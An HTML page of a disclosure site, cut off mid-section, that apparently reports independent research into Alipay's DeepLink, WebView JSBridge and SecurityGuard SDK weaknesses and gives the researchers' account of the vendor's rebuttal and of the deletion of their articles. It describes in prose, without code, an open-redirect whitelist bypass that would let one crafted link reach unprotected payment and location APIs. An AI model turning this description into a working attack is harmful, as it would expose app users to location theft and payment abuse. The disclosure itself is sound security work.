alipay-deeplink-research/index.html
feng a3825c939f update: SEO/privacy overhaul — 36 CVE stats, redact case numbers, full sitemap
- Meta/OG/Twitter tags: 17→36 CVEs, 6→9+ countries, SecurityGuard SDK keywords
- Sitemap: 5→12 URLs with correct lastmod dates
- Privacy: redact CSSF/CIRCL/PDPC case numbers, mask regulator staff names
- Content: add 6 new article pages + evidence screenshots
- Numbers: update all CVE counts (6→36, 11 MITRE tickets)

Co-Authored-By: Claude <noreply@anthropic.com>
2026-03-25 05:28:06 +08:00

<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Alipay Security Research: 36 CVEs, SecurityGuard SDK Analysis | 支付宝安全研究</title>
<meta name="description" content="Independent security research: 36 CVEs filed with MITRE across 11 tickets. SecurityGuard SDK reverse engineering, PatchProxy 146K+ remotely replaceable methods, Docker-reproducible (37/37). IACR ePrint 2026/526. 9+ countries investigating.">
<meta name="author" content="Innora AI Security Research">
<meta property="og:title" content="Alipay SecurityGuard SDK: 36 CVEs, 146K Hot-Patch Hooks, Weak Crypto">
<meta property="og:description" content="36 CVEs filed with MITRE. SecurityGuard SDK teardown: PatchProxy, AVMP bytecode VM, weak crypto. Docker-reproducible. 9+ countries investigating.">
<meta property="og:type" content="article">
<meta property="og:url" content="https://innora.ai/zfb/">
<meta property="og:image" content="https://innora.ai/zfb/og-image.png">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="630">
<meta property="og:locale" content="zh_CN">
<meta property="og:locale:alternate" content="en_US">
<meta property="article:published_time" content="2026-03-11T00:00:00+08:00">
<meta property="article:modified_time" content="2026-03-25T00:00:00+08:00">
<meta property="article:author" content="Innora AI Security Research">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Alipay DeepLink Attack Surface: One Link to Rule Them All">
<meta name="twitter:description" content="36 CVEs filed with MITRE. SecurityGuard SDK: 146K hot-patch hooks, weak crypto, no cert pinning. Docker-reproducible. 9+ countries investigating.">
<meta name="twitter:image" content="https://innora.ai/zfb/og-image.png">
<meta name="keywords" content="Alipay, security, vulnerability, CVE, SecurityGuard SDK, PatchProxy, AVMP, DeepLink, JSBridge, whitelist bypass, hot-patch, weak crypto, mobile security, Android security, Ant Group">
<link rel="canonical" href="https://innora.ai/zfb/">
<link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🔒</text></svg>">
<style>
:root {
--bg: #0a0a0f;
--surface: #12121a;
--surface2: #1a1a28;
--border: #2a2a3a;
--text: #e0e0e8;
--text2: #9898a8;
--accent: #ff4444;
--accent2: #ff6b35;
--blue: #4488ff;
--green: #44cc88;
--yellow: #ffaa22;
--purple: #9966ff;
--code-bg: #0d1117;
--max-w: 860px;
}
* { margin: 0; padding: 0; box-sizing: border-box; }
html { scroll-behavior: smooth; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Noto Sans SC', sans-serif;
background: var(--bg);
color: var(--text);
line-height: 1.7;
font-size: 16px;
}
a { color: var(--blue); text-decoration: none; }
a:hover { text-decoration: underline; }
/* Language Toggle */
.lang-toggle {
position: fixed;
top: 16px;
right: 16px;
z-index: 1000;
display: flex;
gap: 0;
border-radius: 6px;
overflow: hidden;
border: 2px solid var(--accent);
background: var(--surface);
}
.lang-toggle button {
padding: 8px 18px;
border: none;
background: transparent;
color: var(--text2);
cursor: pointer;
font-size: 15px;
font-weight: 600;
transition: all .2s;
}
.lang-toggle button.active {
background: var(--accent);
color: #fff;
}
/* Alert Banner */
.alert-banner {
background: linear-gradient(90deg, #1a0520, #2a0a10);
border-bottom: 2px solid var(--accent);
padding: 14px 24px;
text-align: center;
position: relative;
z-index: 100;
}
.alert-banner a {
color: #fff;
font-weight: 700;
font-size: 15px;
text-decoration: none;
display: inline-flex;
align-items: center;
gap: 8px;
}
.alert-banner a:hover { text-decoration: underline; }
.alert-banner .badge {
background: var(--accent);
color: #fff;
padding: 2px 8px;
border-radius: 4px;
font-size: 11px;
font-weight: 800;
text-transform: uppercase;
letter-spacing: 1px;
animation: pulse 2s infinite;
}
@keyframes pulse {
0%, 100% { opacity: 1; }
50% { opacity: 0.7; }
}
/* Hero */
.hero {
padding: 80px 24px 60px;
text-align: center;
background: linear-gradient(180deg, #1a0a0a 0%, var(--bg) 100%);
border-bottom: 1px solid var(--border);
}
.hero-badge {
display: inline-block;
padding: 4px 14px;
border-radius: 20px;
background: rgba(255,68,68,.15);
color: var(--accent);
font-size: 13px;
font-weight: 600;
letter-spacing: 1px;
text-transform: uppercase;
margin-bottom: 20px;
}
.hero h1 {
font-size: clamp(28px, 5vw, 48px);
font-weight: 800;
line-height: 1.2;
margin-bottom: 16px;
background: linear-gradient(135deg, #ff4444, #ff6b35);
-webkit-background-clip: text;
-webkit-text-fill-color: transparent;
background-clip: text;
}
.hero .subtitle {
font-size: 18px;
color: var(--text2);
max-width: 640px;
margin: 0 auto 24px;
}
.hero-stats {
display: flex;
justify-content: center;
gap: 32px;
flex-wrap: wrap;
margin-top: 32px;
}
.hero-stat {
text-align: center;
}
.hero-stat .num {
font-size: 36px;
font-weight: 800;
color: var(--accent);
}
.hero-stat .label {
font-size: 13px;
color: var(--text2);
text-transform: uppercase;
letter-spacing: 1px;
}
/* Main content */
.container { max-width: var(--max-w); margin: 0 auto; padding: 0 24px; }
section { padding: 48px 0; border-bottom: 1px solid var(--border); }
h2 {
font-size: 28px;
font-weight: 700;
margin-bottom: 24px;
color: var(--text);
}
h2 .num { color: var(--accent); margin-right: 8px; }
h3 {
font-size: 20px;
font-weight: 600;
margin: 24px 0 12px;
color: var(--text);
}
p { margin-bottom: 16px; color: var(--text2); }
p strong, li strong { color: var(--text); }
/* Cards */
.card {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 20px;
margin: 16px 0;
}
.card-critical { border-left: 4px solid var(--accent); }
.card-high { border-left: 4px solid var(--accent2); }
.card-medium { border-left: 4px solid var(--yellow); }
.severity {
display: inline-block;
padding: 2px 8px;
border-radius: 4px;
font-size: 11px;
font-weight: 700;
text-transform: uppercase;
letter-spacing: .5px;
}
.sev-critical { background: rgba(255,68,68,.2); color: #ff4444; }
.sev-high { background: rgba(255,107,53,.2); color: #ff6b35; }
.sev-medium { background: rgba(255,170,34,.2); color: #ffaa22; }
/* Code */
pre {
background: var(--code-bg);
border: 1px solid var(--border);
border-radius: 8px;
padding: 16px;
overflow-x: auto;
font-size: 13px;
line-height: 1.6;
margin: 16px 0;
}
code {
font-family: 'SF Mono', 'Fira Code', 'Consolas', monospace;
font-size: 13px;
}
:not(pre) > code {
background: var(--surface2);
padding: 2px 6px;
border-radius: 4px;
color: var(--accent2);
}
/* Tables */
table {
width: 100%;
border-collapse: collapse;
margin: 16px 0;
font-size: 14px;
}
th, td {
padding: 10px 12px;
text-align: left;
border-bottom: 1px solid var(--border);
}
th {
background: var(--surface2);
font-weight: 600;
color: var(--text);
font-size: 12px;
text-transform: uppercase;
letter-spacing: .5px;
}
td { color: var(--text2); }
/* Timeline */
.timeline { position: relative; padding-left: 32px; }
.timeline::before {
content: '';
position: absolute;
left: 8px;
top: 0;
bottom: 0;
width: 2px;
background: var(--border);
}
.timeline-item {
position: relative;
margin-bottom: 24px;
}
.timeline-item::before {
content: '';
position: absolute;
left: -28px;
top: 6px;
width: 12px;
height: 12px;
border-radius: 50%;
background: var(--accent);
border: 2px solid var(--bg);
}
.timeline-date {
font-size: 13px;
color: var(--accent);
font-weight: 600;
}
/* Attack chain diagram */
.attack-chain {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 24px;
margin: 24px 0;
}
.chain-step {
display: flex;
align-items: flex-start;
gap: 16px;
padding: 12px 0;
}
.chain-step + .chain-step {
border-top: 1px dashed var(--border);
}
.chain-num {
flex-shrink: 0;
width: 32px;
height: 32px;
border-radius: 50%;
background: var(--accent);
color: #fff;
display: flex;
align-items: center;
justify-content: center;
font-weight: 700;
font-size: 14px;
}
.chain-arrow {
text-align: center;
color: var(--accent);
font-size: 20px;
padding: 4px 0;
}
/* Evidence box */
.evidence-box {
background: #0d1117;
border: 1px solid #1a3a2a;
border-radius: 8px;
padding: 16px;
margin: 12px 0;
}
.evidence-box .label {
color: var(--green);
font-size: 12px;
font-weight: 600;
text-transform: uppercase;
letter-spacing: 1px;
margin-bottom: 8px;
}
/* Quote/Callout */
.callout {
background: var(--surface2);
border-left: 4px solid var(--accent);
padding: 16px 20px;
margin: 24px 0;
border-radius: 0 8px 8px 0;
}
.callout.vendor {
border-left-color: var(--yellow);
background: rgba(255,170,34,.05);
}
.callout.info {
border-left-color: var(--blue);
background: rgba(68,136,255,.05);
}
/* Devices grid */
.devices-grid {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(240px, 1fr));
gap: 16px;
margin: 16px 0;
}
.device-card {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 16px;
text-align: center;
}
.device-card .icon { font-size: 36px; margin-bottom: 8px; }
.device-card .name { font-weight: 600; color: var(--text); margin-bottom: 4px; }
.device-card .detail { font-size: 13px; color: var(--text2); }
/* TOC */
.toc {
background: var(--surface);
border: 1px solid var(--border);
border-radius: 10px;
padding: 20px;
margin: 32px 0;
}
.toc h3 { margin-top: 0; font-size: 16px; }
.toc ol { padding-left: 20px; }
.toc li { margin: 6px 0; color: var(--text2); font-size: 14px; }
.toc li a { color: var(--blue); }
/* Footer */
footer {
padding: 48px 24px;
text-align: center;
color: var(--text2);
font-size: 13px;
}
/* Lists */
ul, ol { margin: 12px 0; padding-left: 24px; }
li { margin: 6px 0; color: var(--text2); }
/* Bilingual */
.zh { display: none; }
.en { display: block; }
body.lang-zh .zh { display: block; }
body.lang-zh .en { display: none; }
/* Responsive */
@media (max-width: 768px) {
.hero { padding: 48px 16px 36px; }
.hero h1 { font-size: 24px; }
.hero .subtitle { font-size: 14px; }
.hero-stats { gap: 16px; }
.hero-stat .num { font-size: 28px; }
section { padding: 24px 16px; }
.card { padding: 16px; }
.toc { padding: 16px; }
.toc ol { padding-left: 20px; }
table { font-size: 12px; }
th, td { padding: 6px 8px; }
pre { font-size: 11px; padding: 12px; }
.evidence-box pre, .evidence-box code { font-size: 10px; overflow-x: auto; }
.timeline-item { padding-left: 16px; }
.lang-toggle { top: 8px; right: 8px; }
.lang-toggle button { padding: 4px 10px; font-size: 11px; }
}
@media (max-width: 480px) {
.hero h1 { font-size: 20px; }
section h2 { font-size: 20px; }
.num { font-size: 14px; }
}
/* Print */
@media print {
body { background: #fff; color: #000; font-size: 12pt; }
.lang-toggle, .hero-badge, footer { display: none; }
.hero { background: none; }
a { color: #000; text-decoration: underline; }
a[href]::after { content: " (" attr(href) ")"; font-size: 9pt; }
section { break-inside: avoid; page-break-inside: avoid; }
.card { border: 1px solid #ccc; background: #f9f9f9; }
.evidence-box { background: #f0f0f0; border: 1px solid #999; }
pre, code { background: #eee; color: #000; }
}
</style>
<script type="application/ld+json">
{
"@context": "https://schema.org",
"@type": "Article",
"headline": "Alipay Security Research — 36 CVEs, SecurityGuard SDK Analysis",
"description": "Independent security research: 36 CVEs filed with MITRE, SecurityGuard SDK reverse engineering, PatchProxy 146K+ remotely replaceable methods. Docker-reproducible.",
"datePublished": "2026-03-11",
"dateModified": "2026-03-14",
"author": {"@type": "Organization", "name": "Innora AI Security Research", "url": "https://innora.ai"},
"publisher": {"@type": "Organization", "name": "Innora AI Security Research"},
"url": "https://innora.ai/zfb/",
"mainEntityOfPage": "https://innora.ai/zfb/",
"keywords": ["Alipay", "security vulnerability", "CVE", "DeepLink", "JSBridge", "whitelist bypass"]
}
</script>
</head>
<body>
<!-- Alert Banner -->
<div class="alert-banner">
<a href="article_censorship.html">
<span class="badge" style="background:#ff2222;">CENSORED x8</span>
<span class="en">⚠️ 8 Research Articles FORCE-DELETED in 2 Waves (Mar 15 + Mar 20) — Ant Group's law firm weaponized Cybersecurity Law after initial complaint was rejected → Full evidence & timeline</span>
<span class="zh">⚠️ 8篇研究文章被分两波强制删除(3/15 + 3/20)— 蚂蚁律所将网络安全法武器化,首次投诉被驳回后更换法律依据 → 完整证据与时间线</span>
<span style="font-size:18px"></span>
</a>
</div>
<!-- Language Toggle -->
<div class="lang-toggle">
<button id="btn-zh" class="" onclick="setLang('zh')">中文</button>
<button id="btn-en" class="active" onclick="setLang('en')">EN</button>
</div>
<!-- ==================== HERO ==================== -->
<div class="hero">
<div class="hero-badge">
<span class="zh">独立安全研究</span>
<span class="en">Independent Security Research</span>
</div>
<h1>
<span class="zh">支付宝 DeepLink 攻击面分析</span>
<span class="en">Alipay DeepLink Attack Surface Analysis</span>
</h1>
<h1 style="font-size: clamp(18px, 3vw, 28px); margin-top: -8px;">
<span class="zh">一个链接,通向一切</span>
<span class="en">One Link to Rule Them All</span>
</h1>
<p class="subtitle">
<span class="zh">针对支付宝 Android/iOS 最新版的 DeepLink + WebView JSBridge 攻击链端到端分析。已通过负责任披露流程向蚂蚁集团报告,厂商回复为"正常功能"。</span>
<span class="en">End-to-end analysis of the DeepLink + WebView JSBridge attack chain on the latest Alipay Android/iOS versions. Reported to Ant Group through responsible disclosure. Vendor response: "normal functionality."</span>
</p>
<div class="hero-stats">
<div class="hero-stat">
<div class="num">17</div>
<div class="label">
<span class="zh">已验证问题</span>
<span class="en">Verified Issues</span>
</div>
</div>
<div class="hero-stat">
<div class="num">308</div>
<div class="label">
<span class="zh">服务器日志</span>
<span class="en">Exfil Logs</span>
</div>
</div>
<div class="hero-stat">
<div class="num">3</div>
<div class="label">
<span class="zh">验证设备</span>
<span class="en">Devices Tested</span>
</div>
</div>
<div class="hero-stat">
<div class="num">42</div>
<div class="label">
<span class="zh">证据截图</span>
<span class="en">Screenshots</span>
</div>
</div>
</div>
</div>
<!-- ==================== NEW: SECURITYGUARD PRIVACY ANALYSIS ==================== -->
<div style="max-width:860px;margin:24px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(68,136,255,.10), rgba(153,102,255,.08));border:2px solid #4488ff;border-radius:12px;padding:28px 28px 24px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#4488ff,#9966ff,#4488ff);"></div>
<div style="position:absolute;top:16px;right:20px;background:#4488ff;color:#fff;font-size:11px;padding:4px 10px;border-radius:4px;font-weight:bold;letter-spacing:1px;">NEW 2026-03-17</div>
<h2 style="color:#4488ff;font-size:22px;margin:0 0 16px 0;text-align:center;">
<span class="zh">🔬 独立安全研究:支付宝 SecurityGuard SDK 完整逆向 — 208个API拦截 · 97%接口无保护</span>
<span class="en">🔬 Independent Research: Alipay SecurityGuard SDK Full Reverse Engineering — 208 API Intercepts · 97% Unprotected</span>
</h2>
<div class="zh">
<p style="color:#9898a8;font-size:15px;line-height:1.8;margin-bottom:16px;">我们对支付宝内置的 SecurityGuard 安全 SDK 进行了完整逆向工程分析,发现了远超支付安全需求的大规模数据采集行为:</p>
<div style="display:grid;grid-template-columns:repeat(4,1fr);gap:12px;margin-bottom:18px;">
<div style="background:rgba(68,136,255,.08);border:1px solid rgba(68,136,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#4488ff;">208</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">API拦截类别</div></div>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ff4444;">97%</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">接口无权限保护</div></div>
<div style="background:rgba(255,170,34,.08);border:1px solid rgba(255,170,34,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ffaa22;">22</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">行为监控事件</div></div>
<div style="background:rgba(153,102,255,.08);border:1px solid rgba(153,102,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#9966ff;">29</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">设备指纹项</div></div>
</div>
<div style="display:grid;grid-template-columns:40px 1fr;gap:6px 12px;align-items:start;margin-bottom:14px;">
<div style="font-size:20px;text-align:center;">📱</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#4488ff;">DexAOP字节码拦截</strong> — 976个代理类拦截蓝牙(17)、电话(17)、通讯录(12)、摄像头(5)、录音(9)、剪贴板(4)等几乎所有硬件能力</div>
<div style="font-size:20px;text-align:center;">👁️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ffaa22;">行为监控</strong> — 截屏、录屏、通话状态、剪贴板变化、蓝牙连接,每 10 条批量上报服务器</div>
<div style="font-size:20px;text-align:center;">🔓</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ff4444;">396/408内部接口无保护</strong> — 支付、数字人民币钱包、NFC、文件操作等97%接口没有权限检查</div>
<div style="font-size:20px;text-align:center;">🛰️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#9966ff;">PatchProxy远程修改</strong> — 服务器可远程修改 TLS 验证、权限检查、支付校验,无需用户同意</div>
</div>
<div style="display:flex;gap:12px;margin-top:16px;flex-wrap:wrap;">
<a href="privacy-analysis.html" style="background:#4488ff;color:#fff;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;display:inline-block;">📄 阅读完整隐私分析报告</a>
<a href="https://github.com/sgInnora/alipay-securityguard-analysis" style="background:rgba(255,255,255,.1);color:#ccc;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;border:1px solid #444;display:inline-block;">⭐ GitHub 完整代码</a>
</div>
</div>
<div class="en">
<p style="color:#9898a8;font-size:15px;line-height:1.8;margin-bottom:16px;">Complete reverse engineering of Alipay's SecurityGuard SDK reveals massive data collection far beyond payment security requirements:</p>
<div style="display:grid;grid-template-columns:repeat(4,1fr);gap:12px;margin-bottom:18px;">
<div style="background:rgba(68,136,255,.08);border:1px solid rgba(68,136,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#4488ff;">208</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">API Intercepts</div></div>
<div style="background:rgba(255,68,68,.08);border:1px solid rgba(255,68,68,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ff4444;">97%</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">No Permission Check</div></div>
<div style="background:rgba(255,170,34,.08);border:1px solid rgba(255,170,34,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#ffaa22;">22</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">Behavior Events</div></div>
<div style="background:rgba(153,102,255,.08);border:1px solid rgba(153,102,255,.3);border-radius:8px;padding:16px 12px;text-align:center;"><div style="font-size:28px;font-weight:bold;color:#9966ff;">29</div><div style="font-size:12px;color:#9898a8;margin-top:4px;">Fingerprint Items</div></div>
</div>
<div style="display:grid;grid-template-columns:40px 1fr;gap:6px 12px;align-items:start;margin-bottom:14px;">
<div style="font-size:20px;text-align:center;">📱</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#4488ff;">DexAOP Bytecode Interception</strong> — 976 proxy classes intercept Bluetooth (17), Telephony (17), Contacts (12), Camera (5), Audio (9), Clipboard (4)</div>
<div style="font-size:20px;text-align:center;">👁️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ffaa22;">Behavior Monitoring</strong> — Screenshot, screen recording, call state, clipboard changes — batched every 10 events</div>
<div style="font-size:20px;text-align:center;">🔓</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#ff4444;">396/408 Unprotected</strong> — 97% of JSBridge APIs including payment, digital yuan wallet, NFC have zero permission checks</div>
<div style="font-size:20px;text-align:center;">🛰️</div><div style="color:#ccc;font-size:14px;line-height:1.7;"><strong style="color:#9966ff;">PatchProxy Remote Mod</strong> — Server can remotely alter TLS validation, permission checks and payment verification without user consent</div>
</div>
<div style="display:flex;gap:12px;margin-top:16px;flex-wrap:wrap;">
<a href="privacy-analysis.html" style="background:#4488ff;color:#fff;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;display:inline-block;">📄 Read Full Privacy Analysis</a>
<a href="https://github.com/sgInnora/alipay-securityguard-analysis" style="background:rgba(255,255,255,.1);color:#ccc;padding:12px 24px;border-radius:8px;font-weight:bold;font-size:15px;text-decoration:none;border:1px solid #444;display:inline-block;">⭐ GitHub Repository</a>
</div>
</div>
</div>
</div>
<!-- ==================== CENSORSHIP NOTICE: WECHAT ARTICLES DELETED 2026-03-15 ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,0,0,.06));border:2px solid #ff4444;border-radius:12px;padding:24px 28px 20px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff0000,#ff4444,#ff0000);animation:pulse 2s infinite;"></div>
<style>@keyframes pulse{0%,100%{opacity:1}50%{opacity:.5}}</style>
<h2 style="color:#ff4444;font-size:20px;margin:0 0 14px 0;text-align:center;">
<span class="zh">🚨 审查通知:微信公众号文章已被全部强制删除</span>
<span class="en">🚨 CENSORSHIP NOTICE: All WeChat Articles Forcibly Deleted</span>
</h2>
<div style="background:rgba(255,0,0,.08);border:1px solid rgba(255,68,68,.4);border-radius:8px;padding:16px 18px;margin-bottom:16px;">
<span class="zh" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">2026-03-15</strong> — 我们在微信公众号 <strong>AI-security-innora</strong> 发布的 <strong style="color:#fff;">4 篇安全研究文章全部被强制删除</strong>。<br>
删除通知仅写:<strong>"接相关投诉,违反《中华人民共和国网络安全法》"</strong><br>
<strong style="color:#fff;">注意:删除通知中未显示任何投诉方信息、未列明具体违规条款、未提供申诉机会。</strong>这不是正常的投诉处理流程——正常流程会显示投诉方身份和具体主张并允许申诉。这是<strong style="color:#ff4444;">跳过正常程序的直接暴力删除</strong><br><br>
这是厂商应对安全研究的第四层手段:<br>
<span style="color:#ffaa44;">① 口头否认(3/10 "正常功能")→ ② 律师函(3/11,发布 4 小时后)→ ③ 服务器端封堵 PoC(3/15,白名单拦截)→ ④ 平台审查删除所有文章(3/15)</span><br><br>
<strong style="color:#fff;">本页面 (innora.ai/zfb/) 部署在中国境外服务器,不受微信平台审查影响。研究内容完整保留。</strong><br>
<span style="background:rgba(255,255,0,.15);padding:4px 8px;border-radius:4px;display:inline-block;margin-top:8px;"><strong style="color:#ffdd44;">本服务器及研究者本人分属新加坡、新西兰、美国三地注册公司。如需通过法律途径删除本页面内容,需在三地法院分别完成完整法律程序。欢迎通过正当法律渠道沟通。</strong></span>
</span>
<span class="en" style="color:#ff8888;font-size:14px;line-height:2;">
<strong style="color:#ff4444;">2026-03-15</strong> — All <strong style="color:#fff;">4 security research articles</strong> published on our WeChat Official Account <strong>AI-security-innora</strong> have been <strong style="color:#fff;">forcibly deleted</strong>.<br>
The only reason given: <strong>"Following a related complaint, violation of the Cybersecurity Law of the PRC."</strong><br>
<strong style="color:#fff;">Note: The deletion notice identifies NO complainant, cites NO specific legal provision, and offers NO appeal process.</strong> This is NOT a normal complaint procedure — standard process shows the complainant's identity and specific claims, and allows appeal. This is a <strong style="color:#ff4444;">brute-force deletion bypassing normal procedures</strong>.<br><br>
This represents the vendor's fourth layer of response to security research:<br>
<span style="color:#ffaa44;">① Verbal denial (3/10 "normal functionality") → ② Lawyer's letter (3/11, 4hrs after disclosure) → ③ Server-side PoC blocking (3/15, whitelist filtering) → ④ Platform censorship of all articles (3/15)</span><br><br>
<strong style="color:#fff;">This page (innora.ai/zfb/) is hosted outside mainland China and is not subject to WeChat censorship. All research content is preserved here.</strong><br>
<span style="background:rgba(255,255,0,.15);padding:4px 8px;border-radius:4px;display:inline-block;margin-top:8px;"><strong style="color:#ffdd44;">This server and the researcher are affiliated with companies registered in Singapore, New Zealand, and the United States. Any legal request to remove this content must complete full legal proceedings in all three jurisdictions. We welcome communication through proper legal channels.</strong></span>
</span>
</div>
<div style="background:rgba(255,255,255,.03);border:1px solid #2a2a3a;border-radius:8px;padding:16px;margin-bottom:12px;">
<p style="color:#ff8888;font-size:14px;font-weight:bold;margin:0 0 10px;">
<span class="zh">被删除的 4 篇文章:</span>
<span class="en">4 Deleted Articles:</span>
</p>
<div style="display:grid;gap:8px;">
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查</span><span class="en">When Whitelist Bypass Becomes the Master Key</span></span>
</div>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决</span><span class="en">Tech Giant's "Gag Order" Rejected by WeChat</span></span>
</div>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">位置被秒偷!10多亿人每天在用的国民支付应用,17个「正常功能」细思极恐</span><span class="en">Location Stolen Instantly! 17 "Normal Features"</span></span>
</div>
<div style="background:rgba(255,68,68,.06);border:1px solid rgba(255,68,68,.2);border-radius:6px;padding:10px 14px;position:relative;">
<span style="background:#ff4444;color:#fff;font-size:10px;padding:2px 6px;border-radius:3px;font-weight:bold;position:absolute;top:10px;right:10px;">DELETED</span>
<span style="color:#888;font-size:13px;text-decoration:line-through;"><span class="zh">支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"</span><span class="en">Alipay Research Hit with Lawyer's Letter</span></span>
</div>
</div>
</div>
<div style="display:grid;grid-template-columns:1fr 1fr;gap:10px;">
<div style="text-align:center;">
<img src="wechat_censored_1.jpeg" alt="WeChat censorship notification 1" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (1/2)</span><span class="en">WeChat deletion notice (1/2)</span></p>
</div>
<div style="text-align:center;">
<img src="wechat_censored_2.jpeg" alt="WeChat censorship notification 2" style="width:100%;border-radius:8px;border:1px solid #333;" loading="lazy">
<p style="color:#666;font-size:11px;margin:6px 0 0;"><span class="zh">微信平台删除通知 (2/2)</span><span class="en">WeChat deletion notice (2/2)</span></p>
</div>
</div>
</div>
</div>
<!-- ==================== CRITICAL: WHITELIST BYPASS BANNER ==================== -->
<div style="max-width:860px;margin:20px auto 0;padding:0 24px;">
<div style="background:linear-gradient(135deg, rgba(255,68,68,.12), rgba(255,107,53,.08));border:2px solid #ff4444;border-radius:12px;padding:28px 28px 24px;position:relative;overflow:hidden;">
<div style="position:absolute;top:0;left:0;right:0;height:4px;background:linear-gradient(90deg,#ff4444,#ff6b35,#ff4444);"></div>
<h2 style="color:#ff4444;font-size:22px;margin:0 0 16px 0;text-align:center;">
<span class="zh">⚠️ 核心发现:白名单绕过 — 任何人无需任何权限即可远程利用 (CVSS 9.3)</span>
<span class="en">⚠️ Key Finding: Whitelist Bypass — Remotely Exploitable by Anyone, No Permissions Required (CVSS 9.3)</span>
</h2>
<div class="zh">
<div style="display:grid;grid-template-columns:40px 1fr;gap:8px 12px;align-items:start;margin-bottom:16px;">
<div style="font-size:24px;text-align:center;">🔑</div>
<div><strong style="color:#ff6b35;">这是整个攻击链的钥匙。</strong>支付宝使用域名白名单限制 WebView 中可加载的页面。但其自有域名 <code style="background:#1a1a28;padding:2px 6px;border-radius:4px;color:#ff8888;">ds.alipay.com</code> 存在开放重定向漏洞,允许攻击者通过白名单域名跳转加载任意恶意页面。<strong>没有此绕过,其余漏洞仅限局域网;有了它,人人可远程利用。</strong></div>
<div style="font-size:24px;text-align:center;">👤</div>
<div><strong style="color:#ff6b35;">不需要任何开发者权限。</strong>不需要注册支付宝开放平台、不需要小程序开发者资格、不需要任何审批。攻击者只需构造一条 URL,通过微信、WhatsApp、短信或任何即时通讯工具发送给受害者。</div>
<div style="font-size:24px;text-align:center;">💣</div>
<div><strong style="color:#ff6b35;">17个漏洞因此从"理论"变为"实战"。</strong>攻击者页面一旦加载到支付宝 WebView 中,即获得完整的 JSBridge API 访问权限——<strong>静默窃取 GPS 坐标、调用支付接口、打开相机、伪造 UI</strong>——全部通过一条链接完成。</div>
<div style="font-size:24px;text-align:center;">💬</div>
<div><strong style="color:#ff6b35;">厂商自己承认严重性。</strong>蚂蚁集团安全团队在与我们的通话中明确表示:<em>"如果能绕过我们的白名单限制,那就严重了"</em>。通话结束后不到 2 分钟,白名单即被绕过。<strong>厂商确认了严重性,但至今拒绝修复,称其为"正常功能"。</strong></div>
